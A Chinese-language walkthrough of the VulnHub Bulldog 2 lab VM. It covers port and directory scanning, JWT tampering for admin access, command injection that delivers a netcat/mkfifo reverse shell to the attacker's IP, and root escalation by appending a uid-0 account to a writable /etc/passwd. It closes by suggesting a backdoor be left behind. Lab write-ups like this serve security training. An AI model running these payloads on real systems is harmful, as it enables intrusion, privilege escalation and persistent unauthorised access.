链接:https://download.vulnhub.com/bulldog/
用种子文件下载,直接下载无法下载
- 攻击 IP:192.168.224.139
- 被攻击 IP(虚拟机启动成功自动显示):192.168.43.189
虚拟机安装前言#
- 下载来的虚拟机得用 Virtual Box 打开使用,Vm 下无法连接网络,也可能是我打开姿势不对
- 虚拟机网络与 kali 都使用桥接模式
端口扫描#
nmap -v -A -T4 192.168.43.189
- 只开了一个 80 端口
漏洞查找#
-
只开了 80 端口,直接对 web 服务进行检查
-
目录扫描
dirb htp://192.168.43.189![]()
-
并没有扫描出很特别的目录,访问看看
-
有意思的是,无论你访问哪个页面,源代码永远不变,显然这是 js 的锅
![]()
-
把所有 js 文件拿来瞧瞧~
- particles.min.js
![]()
- 看上去是个开源库,没必要深究
- inline.7a6fe116b23fa31a9970.bundle.js
- 格式化后是个 “webpack”打包的东东,好像是个入口函数之类的东西~
- polyfills.f056ccbeb07b92448c13.bundle.js
- 是“webpack”打包的内容
- vendor.0ce9a4a4addea27177ca.bundle.js 与 main.8b490782e52b9899e2a7.bundle.js 同上
-
网站有一个注册功能,但是停用了,不过整站都用 javascript 渲染的,注册逻辑应该也在里面,手动搜索一下“register”(因为它是 js 绑定 url 来进行页面渲染的)
-
找到了注册参数
![]()
-
注册链接也找到了
-
BurpSuite 重新发包测试
![]()
-
已经注册成功,尝试登录
-
登录成功
![]()
-
查看身份验证数据
![]()
-
第一个 token 是 JWT,第二个 User 是该用户的信息,框起来的部分直译是用户等级,考虑通过他进行越权,由于整站使用 js 渲染,所以管理员的界面如果要与普通用户不同,js 中必定会对用户等级进行鉴定,再次搜索 js 文件
![]()
-
管理员长这样...下面就是替换了
-
JWT 打开
这个
进行解密替换,user 对应的字符串直接替换,替换完成刷新![]()
![]()
-
越权成功
-
打开 admin
![]()
-
burp 抓包,重新发了一个有问题的 json 数据包,直接报错
![]()
-
是一个 nodejs 的项目,项目名称叫 Bulldog-2-The-Reckoning,在 github 上搜了一下,居然
搜到了
![]()
-
找到响应文件,是直接执行命令行
![]()
-
存在命令注入,直接使用 nc 反弹 shell
-
kali 执行
nc -nvlp 1234 -
burp 重新发包
6 & rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.43.109 1234 >/tmp/f;![]()
![]()
-
已经反弹成功
-
查看用户信息,不是 root 权限
![]()
-
查看普通用户可编辑文件
find / -perm -7 ! -type l -ls 2>/dev/null![]()
-
瞅瞅,linux 下的用户数据库 /etc/passwd 居然是可读写
-
不如给他加个 root 权限的账号,本来使用的是空密码,但是失败了,就加了密码
-
生成加密密码:
perl -le 'print crypt("pass","aa")'![]()
-
执行
echo 'hacker2:aaW3cJZ7OSoQM:0:0:hack:/root:/bin/bash' >>/etc/passwd追加到文件中 -
命令解释:
用户名:加密密码:Uid(为0是root):用户组gid(为0是root):用户说明:默认目录:shell -
提权
![]()
-
渗透完成,可以在里面留个后门啥的,以便日后使用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论